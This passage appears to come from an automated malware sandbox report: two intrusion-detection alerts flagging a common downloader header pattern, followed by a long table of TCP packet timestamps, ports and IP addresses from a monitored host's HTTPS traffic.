2024-12-17T13:36:31.439645+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49889	172.67.177.134	443	TCP
2024-12-17T13:36:40.760862+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49915	172.67.177.134	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 13:36:04.125099897 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:04.125138044 CET	443	49817	172.217.19.174	192.168.2.5
Dec 17, 2024 13:36:04.125226021 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:04.142548084 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:04.142559052 CET	443	49817	172.217.19.174	192.168.2.5
Dec 17, 2024 13:36:05.846712112 CET	443	49817	172.217.19.174	192.168.2.5
Dec 17, 2024 13:36:05.846808910 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:05.847806931 CET	443	49817	172.217.19.174	192.168.2.5
Dec 17, 2024 13:36:05.847853899 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:05.888032913 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:05.888055086 CET	443	49817	172.217.19.174	192.168.2.5
Dec 17, 2024 13:36:05.889033079 CET	443	49817	172.217.19.174	192.168.2.5
Dec 17, 2024 13:36:05.889111042 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:05.890726089 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:05.935343027 CET	443	49817	172.217.19.174	192.168.2.5
Dec 17, 2024 13:36:06.745532036 CET	443	49817	172.217.19.174	192.168.2.5
Dec 17, 2024 13:36:06.745851040 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:06.745989084 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:06.746083021 CET	443	49817	172.217.19.174	192.168.2.5
Dec 17, 2024 13:36:06.746149063 CET	49817	443	192.168.2.5	172.217.19.174
Dec 17, 2024 13:36:06.908130884 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:06.908173084 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:06.908576012 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:06.908941031 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:06.908951044 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:08.617868900 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:08.617957115 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:08.622414112 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:08.622421980 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:08.622812986 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:08.622875929 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:08.623209953 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:08.667329073 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.519709110 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.519788980 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.534235954 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.534362078 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.639430046 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.639571905 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.643345118 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.643436909 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.644486904 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.644557953 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.712589979 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.712711096 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.716155052 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.716253996 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.716283083 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.716340065 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.721477985 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.721592903 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.730479002 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.730555058 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.731509924 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.731626987 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.738815069 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.738990068 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.742424011 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.742544889 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.747577906 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.747771025 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.755541086 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.755645990 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.758997917 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.759105921 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.767677069 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.767749071 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.770711899 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.770832062 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.781305075 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.781377077 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.784532070 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.784605980 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.798557043 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.798737049 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.800168991 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.800228119 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.808820963 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.808923006 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.812010050 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.812171936 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.822312117 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.822520018 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.825426102 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.825546026 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.836231947 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.836467981 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.836477995 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.836524963 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.850568056 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.850644112 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.871870041 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.871952057 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.871973038 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.872286081 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.903270960 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.903337955 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.903527021 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.903593063 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.905492067 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.905657053 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.910041094 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.910187006 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.910207033 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.910290003 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.913995028 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.914098978 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.914108038 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.914160967 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.923839092 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.923983097 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.924030066 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.924030066 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.924042940 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.924498081 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.934638023 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.935218096 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.935230970 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.935370922 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.945342064 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.945434093 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.945477962 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.945514917 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.955400944 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.957495928 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.957515001 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.958609104 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.965770960 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.965825081 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.965974092 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.966058016 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.975749016 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.975827932 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.975871086 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.975924969 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.985840082 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.985903978 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.985963106 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.986018896 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.996085882 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.996171951 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:11.996180058 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:11.996236086 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.005953074 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.006006002 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.006091118 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.006149054 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.015439987 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.015552044 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.015626907 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.015841007 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.025042057 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.025114059 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.025121927 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.025161028 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.034077883 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.034130096 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.034177065 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.034233093 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.042876005 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.042932034 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.042964935 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.043024063 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.043050051 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.043145895 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.046983957 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.047049999 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.051331043 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.051383018 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.052448034 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.052495003 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.060614109 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.060664892 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.061840057 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.061899900 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.075372934 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.075429916 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.076361895 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.076420069 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.076446056 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.076505899 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.079015970 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.079065084 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.079879045 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.079982042 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.084971905 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.085071087 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.086910963 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.087004900 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.088263988 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.088340998 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.095380068 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.095438004 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.096605062 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.096666098 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.098081112 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.098170996 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.099858046 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.099967957 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.102307081 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.102406025 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.103627920 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.103683949 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.107609034 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.107664108 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.108799934 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.108861923 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.115680933 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.115827084 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.116167068 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.116250038 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.119235039 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.119285107 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.119353056 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.119414091 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.124095917 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.124150991 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.124268055 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.124367952 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.129857063 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.129908085 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.130023956 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.130083084 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.134671926 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.134763002 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.134834051 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.134886026 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.139269114 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.139331102 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.139542103 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.139697075 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.143512011 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.143598080 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.143608093 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.143676996 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.148718119 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.148794889 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.148816109 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.149071932 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.153651953 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.153722048 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.153955936 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.154042959 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.158457994 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.158555984 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.158567905 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.158759117 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.164228916 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.164362907 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.164371967 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.164418936 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.168956995 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.169255018 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.169991016 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.170073032 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.174309015 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.174432039 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.174438953 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.174510956 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.179220915 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.179286003 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.179408073 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.179553032 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.183100939 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.183160067 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.183340073 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.183465004 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.188771009 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.189055920 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.189064980 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.189187050 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.191710949 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.191827059 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.191843033 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.191989899 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.197926998 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.198045969 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.199183941 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.199266911 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.201818943 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.201905966 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.201913118 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.201957941 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.207505941 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.207581043 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.207631111 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.207679033 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.210175037 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.210318089 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.210325956 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.210408926 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.216840982 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.216975927 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.216989040 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.217040062 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.218981981 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.219050884 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.219147921 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.219202995 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.226069927 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.226167917 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.226192951 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.226300955 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.227988005 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.228086948 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.228106976 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.228164911 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.228193998 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.228332043 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.234774113 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.234883070 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.234891891 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.235002995 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.236470938 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.236563921 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.236591101 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.236677885 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.247153044 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.248224974 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.248284101 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.248291969 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.248347998 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.248380899 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.248437881 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.252037048 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.253201962 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.253288031 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.253299952 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.253310919 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.253355026 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.253355026 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.257828951 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.257922888 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.257934093 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.258009911 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.261995077 CET	443	49823	142.250.181.97	192.168.2.5
